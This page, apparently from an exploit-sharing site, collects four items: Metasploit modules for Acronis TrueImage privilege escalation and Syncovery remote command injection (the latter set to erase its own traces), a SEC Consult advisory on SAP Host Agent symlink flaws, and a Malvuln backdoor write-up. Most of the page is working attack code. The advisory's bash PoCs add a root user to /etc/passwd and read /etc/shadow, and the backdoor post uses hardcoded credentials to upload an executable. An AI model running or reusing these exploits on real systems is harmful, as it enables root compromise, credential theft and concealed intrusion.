Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Common include Msf::Post::Process include Msf::Exploit::EXE include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Acronis TrueImage XPC Privilege Escalation', 'Description' => %q{ Acronis TrueImage versions 2019 update 1 through 2021 update 1 are vulnerable to privilege escalation. The `com.acronis.trueimagehelper` helper tool does not perform any validation on connecting clients, which gives arbitrary clients the ability to execute functions provided by the helper tool with `root` privileges. }, 'License' => MSF_LICENSE, 'Author' => [ 'Csaba Fitzl', # @theevilbit - Vulnerability Discovery 'Shelby Pace' # Metasploit Module and Objective-c code ], 'Platform' => [ 'osx' ], 'Arch' => [ ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'References' => [ [ 'CVE', '2020-25736' ], [ 'URL', 'https://kb.acronis.com/content/68061' ], [ 'URL', 'https://attackerkb.com/topics/a1Yrvagxt5/cve-2020-25736' ] ], 'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp', 'WfsDelay' => 15 }, 'DisclosureDate' => '2020-11-11', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'Reliability' => [ REPEATABLE_SESSION ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ] } ) ) register_options([ OptString.new('WRITABLE_DIR', [ true, 'Writable directory to write the payload to', '/tmp' ]), OptString.new('SHELL', [ true, 'Shell to use for executing payload', '/bin/zsh' ]), OptEnum.new('COMPILE', [ true, 'Compile exploit on target', 'Auto', [ 'Auto', 'True', 'False' ] ]) ]) end def tmp_dir datastore['WRITABLE_DIR'].to_s end def sys_shell datastore['SHELL'].to_s end def compile datastore['COMPILE'] end def compile_on_target? return false if compile == 'False' if compile == 'Auto' ret = cmd_exec('xcode-select -p') return false if ret.include?('error: unable') end true end def exp_file_name @exp_file_name ||= Rex::Text.rand_text_alpha(5..10) end def check helper_location = '/Library/PrivilegedHelperTools' helper_svc_names = [ 'com.acronis.trueimagehelper', 'com.acronis.helpertool' ] plist = '/Applications/Acronis True Image.app/Contents/Info.plist' unless helper_svc_names.any? { |svc_name| file?("#{helper_location}/#{svc_name}") } return CheckCode::Safe end return CheckCode::Detected('Service found, but cannot determine version via plist') unless file?(plist) plutil_cmd = "plutil -extract CFBundleVersion raw \'#{plist}\'" build_no = cmd_exec(plutil_cmd) return CheckCode::Detected('Could not retrieve build number from plist') if build_no.blank? build_no = build_no.to_i vprint_status("Found build #{build_no}") return CheckCode::Appears('Vulnerable build found') if build_no > 14170 && build_no < 33610 CheckCode::Safe('Acronis version found is not vulnerable') end def exploit payload_name = Rex::Text.rand_text_alpha(7) @payload_path = "#{tmp_dir}/#{payload_name}" print_status("Attempting to write payload at #{@payload_path}") unless upload_and_chmodx(@payload_path, generate_payload_exe) fail_with(Failure::BadConfig, 'Failed to write payload. Consider changing WRITABLE_DIR option.') end vprint_good("Successfully wrote payload at #{@payload_path}") @pid = get_valid_pid exp_bin_path = "#{tmp_dir}/#{exp_file_name}" if compile_on_target? exp_src = "#{exp_file_name}.m" exp_path = "#{tmp_dir}/#{exp_src}" compile_cmd = "gcc -framework Foundation #{exp_path} -o #{exp_bin_path}" unless write_file(exp_path, objective_c_code) fail_with(Failure::BadConfig, 'Failed to write Objective-C exploit to disk. WRITABLE_DIR may need to be changed') end register_files_for_cleanup(@payload_path, exp_path, exp_bin_path) ret = cmd_exec(compile_cmd) fail_with(Failure::UnexpectedReply, "Failed to compile #{exp_src}") unless ret.blank? print_status("Successfully compiled #{exp_src}...Now executing payload") else print_status("Using pre-compiled exploit #{exp_bin_path}") compiled_exploit = compiled_exp unless upload_and_chmodx(exp_bin_path, compiled_exploit) fail_with(Failure::BadConfig, 'Failed to write compiled exploit. Consider changing WRITABLE_DIR option.') end register_files_for_cleanup(exp_bin_path, @payload_path) end cmd_exec(exp_bin_path) end def objective_c_code file_contents = exploit_data('CVE-2020-25736', 'acronis-exp.erb') ERB.new(file_contents).result(binding) rescue Errno::ENOENT fail_with(Failure::NotFound, 'ERB payload file not found') end def compiled_exp compiled = exploit_data('CVE-2020-25736', 'acronis-exp.macho') compiled.gsub!('/tmp/payload', @payload_path) compiled.gsub!('/bin/zsh', sys_shell) compiled.gsub!("\xEF\xBE\xAD\xDE".force_encoding('ASCII-8BIT'), [@pid.to_i].pack('V')) compiled end def get_valid_pid procs = get_processes return '1' if procs.empty? len = procs.length rand_proc = procs[rand(1...len)] return '1' if rand_proc['pid'].to_s.blank? rand_proc['pid'].to_s end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'json' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Syncovery For Linux Web-GUI Authenticated Remote Command Execution', 'Description' => %q{ This module exploits an authenticated command injection vulnerability in the Web GUI of Syncovery File Sync & Backup Software for Linux. Successful exploitation results in remote code execution under the context of the root user. Syncovery allows an authenticated user to create jobs, which are executed before/after a profile is run. Jobs can contain arbitrary system commands and will be executed as root. A valid username and password or a session token is needed to exploit the vulnerability. The profile and its log file will be deleted afterwards to disguise the attack. The vulnerability is known to work on Linux platforms. All Syncovery versions prior to v9.48j are vulnerable including all versions of branch 8. }, 'Author' => [ 'Jan Rude' ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/'], ['CVE', '2022-36534'] ], 'Platform' => 'unix', 'Arch' => [ ARCH_CMD ], 'Targets' => [ ['Syncovery for Linux < 9.48j', {}] ], 'Privileged' => true, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [] }, 'DisclosureDate' => '2022-09-06', 'DefaultTarget' => 0, 'DefaultOptions' => { 'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp' } ) ) register_options( [ Opt::RPORT(8999), # Default is HTTP: 8999; HTTPS: 8943 OptString.new('USERNAME', [true, 'The username to Syncovery (default: default)', 'default']), OptString.new('PASSWORD', [true, 'The password to Syncovery (default: pass)', 'pass']), OptString.new('TOKEN', [false, 'A valid session token', '']), OptString.new('TARGETURI', [true, 'The path to Syncovery', '/']), ] ) end def check res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, '/get_global_variables'), 'method' => 'GET' ) if res && res.code == 200 json_res = res.get_json_document if json_res['isSyncoveryWindows'] == 'false' version = json_res['SyncoveryTitle']&.scan(/Syncovery\s([A-Za-z0-9.]+)/)&.flatten&.first || '' if version.empty? vprint_warning("#{peer} - Could not identify version") Exploit::CheckCode::Detected elsif Rex::Version.new(version) < Rex::Version.new('9.48j') || Rex::Version.new(version) == Rex::Version.new('9.48') vprint_good("#{peer} - Syncovery #{version}") Exploit::CheckCode::Appears else vprint_status("#{peer} - Syncovery #{version}") Exploit::CheckCode::Safe end else Exploit::CheckCode::Safe end else Exploit::CheckCode::Unknown end end def exploit @token = datastore['TOKEN'] if @token.blank? res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/post_applogin.php'), 'vars_get' => { 'login' => datastore['USERNAME'].to_s, 'password' => datastore['PASSWORD'].to_s }, 'method' => 'GET' }) unless res fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request") end # After login, the application should give us a new token # session_token is actually just base64(MM/dd/yyyy HH:mm:ss) at the time of the login json_res = res.get_json_document @token = json_res['session_token'] if @token.present? vprint_good("#{peer} - Login successful") else fail_with(Failure::NoAccess, "#{peer} - Invalid credentials!") end end # send payload @profile_name = Rex::Text.rand_text_alpha_lower(20) json_body = { 'ProfileName' => @profile_name, 'Action' => 'Insert', 'FormName' => 'synapp_profile_editor_form', 'token' => @token, 'Name' => @profile_name, 'LeftPath' => '/dev/null', 'LeftPathDisplay' => '/dev/null', 'RightPath' => '/dev/null', 'RightPathDisplay' => '/dev/null', 'Job_ExecuteBefore' => payload.encoded } res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/post_profilesettings.php'), 'headers' => { 'X-Requested-With' => 'XMLHttpRequest', 'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8' }, 'data' => JSON.generate(json_body) }) if res && res.code == 200 if res.body.to_s.include? 'Session Expired' fail_with(Failure::UnexpectedReply, "#{peer} - Invalid token (Session Expired)") elsif res.body.to_s.include? 'Inserted' vprint_good("#{peer} - Profile created") else fail_with(Failure::UnexpectedReply, "#{peer} - Error (#{res.body})") end else fail_with(Failure::UnexpectedReply, "#{peer} - Error (response code: #{res.code})") end vprint_status("#{peer} - Running profile") json_body = { 'ProfileName' => @profile_name, 'token' => @token, 'attended' => true } res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/post_runprofile.php'), 'data' => JSON.generate(json_body) }) if res && res.code == 200 print_good("#{peer} - Exploit successfully executed") else fail_with(Failure::UnexpectedReply, "#{peer} - Could not run profile (response code: #{res.code})") end end def on_new_session(session) # Delete profile to disguise attack in Web GUI vprint_status("#{peer} - Trying to delete IOCs") json_body = { 'ProfileName' => @profile_name, 'token' => @token } res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/post_deleteprofile.php'), 'data' => JSON.generate(json_body) }) if res && res.code == 200 && (res.body.to_s.include? 'Deleted') vprint_good("#{peer} - Profile successfully deleted") else print_error("#{peer} - Could not delete profile (#{res.body})") end # Remove IOC by deleting log files res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/getprogram_settings.php'), 'vars_get' => { 'token' => @token } ) if res && res.code == 200 json_res = res.get_json_document if json_res['LogPath'].present? log_path = json_res['LogPath'] end end # Request log files res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/logfiles.json'), 'vars_get' => { 'pagenum' => 0, 'pagesize' => 1 }, 'headers' => { 'token' => @token } }) if res && res.code == 200 log_file = res.body.scan(/#{@profile_name}.*?\.log/)&.flatten&.first || '' register_file_for_cleanup("#{log_path}/#{log_file}") else register_dirs_for_cleanup(log_path.to_s) end super end end </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221213-0 > ======================================================================= title: Privilege Escalation Vulnerabilities (UNIX Insecure File Handling) product: SAP® Host Agent (saposcol) vulnerable version: see section "Vulnerable / tested versions" fixed version: see SAP security note 3159736 CVE number: CVE-2022-35295 impact: high homepage: https://www.sap.com/about.html found: 2022-02-18 by: Fabian Hagg (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "SAP® Host Agent is an agent that can accomplish several life-cycle management tasks, such as operating system monitoring, database monitoring, system instance control and provisioning." Source: https://help.sap.com/viewer/141cbf7f183242b0ad0964a5195b24e7/202110.000/en-US/48c6f9627a004da5e10000000a421937.html Business recommendation: ------------------------ By exploiting the vulnerabilities documented in this advisory, a local attacker may escalate privileges on UNIX systems to fully compromise vulnerable servers with root privileges. SEC Consult recommends to implement security note 3159736 where the documented issue is fixed according to the vendor. We advise installing the corrections as a matter of priority to keep business-critical data secured. Vulnerability overview/description: ----------------------------------- Multiple vulnerabilities were identified that could allow a local attacker authenticated as <sid>adm to escalate privileges on SAP UNIX systems. No additional user authentication is required to exploit these issues. The vulnerabilities are due to the privileged saposcol process generating files in its default working directory (/usr/sap/tmp; defined by profile parameter DIR_PERF) owned by the <sid>adm user (sapsys group), and following symbolic links (symlinks) when trying to open/create these files. Note that in some environments the directory might not be owned by the <sid>adm user account but be writable for all users of group sapsys including <sid>adm. An attacker is able to spoof the symbolic links, thus traversing the file system and gaining access to unintended resources. This could permit an attacker to read/write/corrupt files owned by the root user account leading to privilege escalation. 1) UNIX Symlink Following and Insecure File Permissions in Detailed Lock Logging Feature of saposcol The stand-alone saposcol binary available in UNIX systems at /usr/sap/hostctrl/exe/saposcol provides a debugging feature called "detailed lock logging". For this option to be activated, the user <sid>adm can perform the following action: - Starting the stand-alone saposcol binary with command line argument StartLockLog (/usr/sap/hostctrl/exe/saposcol StartLockLog). Once executed, a special flag is set in shared memory that triggers multiple running processes and services (sapstartsrv, saposcol) to create a file called SaposcolMonAreaLocking.log in the default working directory. This directory is writable by the user <sid>adm (group sapsys). One of the processes trying to create the file is the main saposcol service running in the context of the root user account. It was observed that the file is created by the process using the openat() syscall with flags O_WRONLY, O_CREAT and O_APPEND. ----------------------------------------------------------------------- root@sapsrv:~# ps -efw root 1998 /usr/sap/hostctrl/exe/saposcol -l -w60 pf=/usr/sap/hostctrl/ exe/host_profile # Tracing the sapsocol process with PID 1998 root@sapsrv:~# strace -f -e trace=openat,chmod,chown -p 1998 -q [...] openat(AT_FDCWD, "/usr/sap/tmp/SaposcolMonAreaLocking.log", O_WRONLY| O_CREAT|O_APPEND, 0666) = 6 chmod("/usr/sap/tmp/SaposcolMonAreaLocking.log", 0666) = 0 ----------------------------------------------------------------------- Since the openat() call does not have the O_EXCL flag set, it is not ensured that the process actually creates the file. That is, if the file under the given path already exists, the process tries to open the existing file for appending data to it and changing its permissions to world-readable/world-writable (666). Since the process, when opening an existing file, does not check (e.g., by setting the O_NOFOLLOW flag) whether it is a symbolic link that resolves to a target outside of the intended directory, an attacker can cause the process to operate on unauthorized files by placing a malicious symlink before activating the detailed lock logging feature via the stand-alone saposcol binary. This vulnerability may allow an attacker to gain read/ write access to arbitrary files owned by the root user account. 2) UNIX Symlink Following and Race Condition in Hardware Reporting Feature of saposcol The main saposcol service running in the context of the root user account allows to generate reports containing information about the underlying operating system and hardware configuration. For these reports to be generated, the user <sid>adm can perform different actions: - Using function GetSAPOSColHWConf of the saphostctrl binary (/usr/sap/hostctrl/exe/saphostctrl -function GetSAPOSColHWConf [-format <tree|flat>]) that generates a SOAP request for the host agent service (SAPHostControl) on port 1128/1129. The request is forwarded by sapstartsrv to the saposcol service for processing. - Manually crafting a SOAP request identical to the one generated by the saphostctrl binary and sending it to localhost on port 1128 /1129 via the loopback interface (e.g., using curl). This request is forwarded by sapstartsrv to the saposcol service for processing. - Using the dialog interface of the stand-alone saposcol binary (/usr/sap/hostctrl/exe/saposcol -d) and its "ask" feature (ask Hardware/ ask HardwareXML) that communicates with the saposcol service using shared memory segments. - Using transaction ST06 in the application layer (ABAP based instances only). When requested via the SOAP interface of SAPHostControl (sapstartsrv), the privileged saposcol process tries to generate the file hwconfig_<host> / hw_<host>.xml (depending on whether the XML output format is queried) in its working directory. The process then collects information about OS resources and writes this data to the given file. Once saposcol finished its work, the SAPHostControl service opens and reads the file before providing the results to the caller via SOAP response. That is, the newly created file is handled as a shared resource by both processes. It was observed that when creating a malicious symlink before triggering the execution flow described above, the saposcol service does not verify if the link points to a resource outside of the intended directory. Therefore, the targeted file gets truncated, and the collected OS information is written into to it. This could allow an attacker to corrupt files owned by the root user account. Moreover, by looking at the sequence of system calls, it was identified that this procedure also yields a race condition that could be exploited to gain unauthorized read access to files without corrupting them. The syscalls performed by the two processes, when the hardware report is requested via the SOAP interface of SAPHostControl, is shown in the following listing. ----------------------------------------------------------------------- # Triggering the execution flow via the saphostctrl binary secadm@sapsrv:~$ /usr/sap/hostctrl/exe/saphostctrl -function GetSAPOSColHWConf # Tracing the saposcol process with PID 1998 root@sapsrv:~# strace -f -e trace=openat,chmod,chown -p 1998 -q -o strace.saposcol -T -tt root@sapsrv:~# cat strace.saposcol | grep "/usr/sap/tmp/hwconfig_sapsrv" [...] 1998 01:06:18.370022 openat(AT_FDCWD,"/usr/sap/tmp/hwconfig_sapsrv", O_WRONLY|O_CREAT|O_EXCL|O_TRUNC, 0664) = 6 1998 01:06:18.370473 chown("/usr/sap/tmp/hwconfig_sapsrv", -1, 460) = 0 1998 01:06:18.370581 chmod("/usr/sap/tmp/hwconfig_sapsrv", 0664) = 0 1998 01:06:35.231717 chown("/usr/sap/tmp/hwconfig_sapsrv", -1, 460) = 0 1998 01:06:35.231833 chmod("/usr/sap/tmp/hwconfig_sapsrv", 0640) = 0 [...] # Tracing the sapstartsrv SAPHostControl process with PID 1713 root@sapsrv:~# strace -f -e trace=open,openat,chmod,chown -p 1713 -q -o strace.sapstartsrv -T -tt root@sapsrv:~# less strace.sapstartsrv | grep "/usr/sap/tmp/hwconfig_sapsrv" [...] 1713 01:06:35.782818 openat(AT_FDCWD,"/usr/sap/tmp/hwconfig_sapsrv", O_RDONLY) = 20 [...] ----------------------------------------------------------------------- It can be seen that the saposcol service first requests a file descriptor by creating the report file via the openat() syscall. The file is made readable/writable (664) to all users of group sapsys by means of the first series of chmod()/chown() syscalls. The process then retrieves the OS information and writes the results into the report file before a second series of chmod()/chown() syscall ensures that this file is made read-only (640) to users of group sapsys only. The program, however, does not check whether the file under the given path has changed since it was created in the first place. An attacker can attempt to place a malicious symlink in the interval between the saposcol process succeeds in creating the report file and obtaining a file descriptor and before the file permissions are changed by the second series of chmod()/chown() syscalls. If an attacker manages to carefully choose the time period between triggering the execution flow and replacing the newly created file with a link to an otherwise inaccessible resource, this resource does not get corrupted. Instead, the targeted file is made readable to all users of group sapsys, and its content is returned by the SAPHostControl process opening the file in read-only mode afterwards. This may allow an attacker to gain read access to files owned by the root user account. 3) UNIX Symlink Following and Race Condition in System Log Feature of saposcol The main saposcol service running in the context of the root user account allows to generate reports containing information about operating system logs. For these reports to be generated, the user <sid>adm can perform the following action: - Using the dialog interface of the stand-alone saposcol binary (/usr/sap/hostctrl/exe/saposcol -d) and its "ask" feature (ask OsSysLog <number of lines>) that communicates with the main saposcol process using shared memory segments. - Using transaction ST06 in the application layer (ABAP based instances only). It was observed that when creating the system log report file ossyslog_<host> in its working directory, the saposcol process appears to be vulnerable to the same issues as described in 2. 4) UNIX Symlink Following in Log File Creation of saposcol The main saposcol service running in the context of the root user account writes log information to the files dev_coll and dev_coll.tmp in its working directory. It was observed that when creating these log files during startup, the saposcol process resolves malicious symlinks which can be exploited to corrupt arbitrary files owned by the root user account. For successful exploitation, however, user interaction and a restart of the main saposcol process is required. To provoke a restart, the <sid>adm user can stop the running saposcol process by performing the following action: - Using option -k of the stand-alone saposcol binary (/usr/sap/hostctrl/exe/saposcol -k) that communicates with the main saposcol process using shared memory segments. 5) UNIX Symlink Following in Shared Memory Dump File Creation of saposcol The main saposcol service running in the context of the root user account writes the data in the shared memory segment to the file coll.put in its working directory when being terminated. It was observed that when creating this file, the saposcol process resolves malicious symlinks which can be exploited to corrupt arbitrary files owned by the root user account. To stop the running saposcol process and trigger the execution flow, the <sid>adm user can perform the following action: - Using option -k of the stand-alone saposcol binary (/usr/sap/hostctrl/exe/saposcol -k) that communicates with the main saposcol process using shared memory segments. Proof of concept: ----------------- Note that the following PoCs are for demonstration purposes only and must not be executed in live environments. 1) UNIX Symlink Following and Insecure File Permissions in Detailed Lock Logging Feature of saposcol For demonstration purposes, the bash snippet saposcollpe shown in the following listing can be executed when being authenticated to the local system as <sid>adm. ----------------------------------------------------------------------- #!/bin/bash PASSWD="/etc/passwd" USER=$1 PASS=$(openssl passwd -1 -salt $1 $2) echo "[i] Creating malicious symlink." ln -sf $PASSWD /usr/sap/tmp/SaposcolMonAreaLocking.log; echo "[i] Dropping dbg flag in shm via saposcol." /usr/sap/hostctrl/exe/saposcol StartLockLog > /dev/null; echo "[i] Waiting for permissions to be set..." while true; do if [ -w $PASSWD ] then rm -f /usr/sap/tmp/SaposcolMonAreaLocking.log; /usr/sap/hostctrl/exe/saposcol StopLockLog > /dev/null; echo "[i] Success. /etc/passwd is now world-writable." echo "$USER:$PASS:0:0::/root:/bin/bash" >> /etc/passwd; echo "[i] New user" $USER "with UID 0 created." break fi done echo "[+] Done" ----------------------------------------------------------------------- This script exploits the vulnerability to create a new user (username and password specified via command line args) holding root privileges. ----------------------------------------------------------------------- secadm@sapsrv:~$ whoami secadm secadm@sapsrv:~$ id uid=1001(secadm) gid=493(sapsys) groups=493(sapsys),1001(sapinst) secadm@sapsrv:~$ ./saposcollpe sapmatt sappass [i] Creating malicious symlink. [i] Dropping dbg flag in shm via saposcol. [i] Waiting for permissions to be set. [i] Success. /etc/passwd is now world-writable. [i] New user sapmatt with UID 0 created. [+] Done secadm@sapsrv:~$ su - sapmatt Password: Directory: /root sapsrv:~# whoami sapmatt sapsrv:~# id uid=0(sapmatt) gid=0(root) groups=0(root) ----------------------------------------------------------------------- 2) UNIX Symlink Following and Race Condition in Hardware Reporting For demonstration purposes, the bash snippet saposcolrace shown in the following listing can be executed when being authenticated to the local system as <sid>adm. ----------------------------------------------------------------------- #!/bin/bash HOST=$(hostname) TARGETFILE=$1 COUNTER=10 OUT="CONTINUE" ls -la $TARGETFILE echo "[i] Racing..." while [ -n "$OUT" ] do echo "[*] $COUNTER sec" rm -f /usr/sap/tmp/hwconfig_$HOST /usr/sap/hostctrl/exe/saphostctrl -function GetSAPOSColHWConf > /tmp/out 2>>/tmp/out & sleep "$COUNTER"s; ln -sf $TARGETFILE /usr/sap/tmp/hwconfig_$HOST #set symbolic link wait; rm -f /usr/sap/tmp/hwconfig_$HOST OUT=$(cat /tmp/out | grep -i "HW File") if [ -n "$OUT" ] then echo "[i] Final laps..." let "COUNTER-=1" else OUT=$(cat /tmp/out | grep -i "LINUX Configuration") let "COUNTER-=1" fi done echo "[+] Profit!" ls -la $TARGETFILE && cat /tmp/out && rm -f /tmp/out ----------------------------------------------------------------------- This script exploits the vulnerability to obtain the contents of a file specified as a command line argument. In the following example, the /etc/shadow file containing password hashes of the system accounts is retrieved. ----------------------------------------------------------------------- secadm@sapsrv:~$ whoami secadm secadm@sapsrv:~$ id uid=1001(secadm) gid=493(sapsys) groups=493(sapsys),1001(sapinst) secadm@sapsrv:~$ ./saposcolrace /etc/shadow -rw-r----- 1 root shadow 609 Feb 9 2021 /etc/shadow [i] Racing.... [*] 10 sec [*] 9 sec [*] 8 sec [*] 7 sec [*] 6 sec [*] 5 sec [*] 4 sec [*] 3 sec [i] Final laps.... [*] 2 sec [+] Profit! -rw-r----- 1 root sapsys 609 Feb 9 2021 /etc/shadow Webmethod returned successfully ----------------------------------------------------------------------- Name = /usr/sap/tmp/hwconfig_sapsrv Content ----------------------------------------------------------------------- root:*:18516:::::: bin:*:18516:::::: daemon:*:18516:::::: [...] ----------------------------------------------------------------------- 3) UNIX Symlink Following and Race Condition in System Log Feature of saposcol The vulnerability can be verified by placing a malicious symlink and querying the operating system logs via the stand-alone saposcol binary as shown in the following listing. ----------------------------------------------------------------------- secadm@sapsrv:~$ ln -sf /etc/passwd /usr/sap/tmp/ossyslog_<host> secadm@sapsrv:~$ /usr/sap/hostctrl/exe/saposcol -d Collector > ask OsSysLog 10 ----------------------------------------------------------------------- After execution, the file /etc/passwd containing essential user account information is overwritten by system log information. The file is also made read-only to users of group sapsys only. If the time period between querying the operating system log and replacing the newly created report file with a malicious symlink is chosen carefully (similar to the technique shown in 2.), the targeted file can be made readable without corrupting it. 4) UNIX Symlink Following in Log File Creation of saposcol The vulnerability can be verified by placing a malicious symlink as shown in the following listing. ----------------------------------------------------------------------- secadm@sapsrv:~$ ln -sf /etc/passwd /usr/sap/tmp/dev_coll secadm@sapsrv:~$ ln -sf /etc/passwd /usr/sap/tmp/dev_coll.tmp ----------------------------------------------------------------------- After a restart of the main saposcol process, the file /etc/passwd containing essential user account information is overwritten by log data. 5) UNIX Symlink Following in Shared Memory Dump File Creation of saposcol The vulnerability can be verified by placing a malicious symlink and stopping the running saposcol process via the stand-alone saposcol binary as shown in the following listing. ----------------------------------------------------------------------- secadm@sapsrv:~$ ln -sf /etc/passwd /usr/sap/tmp/coll.put secadm@sapsrv:~$ /usr/sap/hostctrl/exe/saposcol -k ----------------------------------------------------------------------- After termination of the main saposcol process, the file /etc/passwd containing essential user account information is overwritten by current data in the shared memory segment. Vulnerable / tested versions: ----------------------------- The following versions of the binaries were found to be vulnerable during our tests: - SAP Host Agent 721 (patch no. 42) SAPOSCOL version COLL 22.11 721 - v2.42 (patch no. 1214) - SAP Host Agent 722 (patch no. 54) SAPOSCOL version COLL 22.11 722 - v2.49 (patch no. 1113) According to the vendor the following releases and versions are affected by the discovered vulnerabilities: - SAPHOSTAGENT 7.22 Vendor contact timeline: ------------------------ 2022-02-22: Contacting vendor through vulnerability submission web form. 2022-02-23: Vendor confirms receipt and assigns internal ID #2280075571. 2022-03-02: Vendor asks for additional information on file system permissions. 2022-03-03: Providing required information via encrypted PGP mail. 2022-03-09: Vendor asks for additional information on file system permissions. 2022-03-10: Providing required information via encrypted PGP mail. 2022-03-30: Vendor accepts vulnerability and states that a fix is in progress. The initially submitted CVSS assessment 7.8 (LLLN|U|HHH) is disagreed with. A new vector string/score 6.7 (NLHN|U|LHH) is proposed by the vendor. 2022-04-04: Providing detailed explanation for initially submitted CVSS score and CVSS vector string. No answer received. 2022-06-14: Requesting update. 2022-06-28: Vendor informs that the security note is expected to be released at September Patchday 2022. 2022-09-10: Vendor informs about upcoming release of the patch and registration of CVE number. 2022-09-13: Vendor releases patch with SAP Security Note 3159736. The corresponding CVE possess a CVSS vector string/score of 6.7 (NLHN|U|LHH). 2022-12-13: Coordinated release of security advisory. Solution: --------- The vendor provides a patched version which should be installed immediately. Patches are available in form of SAP Security Notes which can be accessed via the SAP Customer Launchpad [1]. More information can also be found in the Official SAP Security Patchday Blog [2]. The following Security Note needs to be implemented: 3159736 [1] https://launchpad.support.sap.com/#/securitynotes [2] https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10 Workaround: ----------- Remove write access to the DIR_PERF (e.g. /usr/sap/tmp) directory for <sid>adm account. Note that this change may interfere with other programs such as CCMS. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF F. Hagg / @2022 </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/dd76d8a5874bf8bf05279e35c68449ca.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Backup media: infosec.exchange/@malvuln Threat: Backdoor.Win32.InCommander.17.b Vulnerability: Hardcoded Cleartext Credentials Family: InCommander Type: PE32 MD5: dd76d8a5874bf8bf05279e35c68449ca Vuln ID: MVID-2022-0665 Dropped files: incsrv.exe Disclosure: 12/14/2022 Description: The malware listens on TCP port 9400 and 9401 and requires authentication. However, the username "IncUser-b3" is stored in cleartext in a file named "incsrv.drv" under Windows dir. The password "InClientMainPassword" is also stored in cleartext but within the PE file "incsrv.exe" at offset 000958d0. Third-party adversaries may then upload thier own executables using ftp PASV, STOR commands. Exploit/PoC: C:\>nc64.exe 192.168.18.125 9401 220 InCommad FTP Server ready. USER IncUser-b3 331 Password required for IncUser-b3. PASS InClientMainPassword 230 User IncUser-b3 logged in. SYST 215 UNIX Type: L8 Internet Component Suite PASV 227 Entering Passive Mode (192,168,18,125,241,155). CDUP \ 250 CWD command successful. "C:/" is current directory. STOR DOOM_SM.exe 150 Opening data connection for DOOM_SM.exe. 226 File received ok from socket import * MALWARE_HOST="192.168.18.125" PORT=61851 DOOM="DOOM_SM.exe" def doit(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) f = open(DOOM, "rb") EXE = f.read() s.send(EXE) while EXE: s.send(EXE) EXE=f.read() s.close() print("By Malvuln"); if __name__=="__main__": doit() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

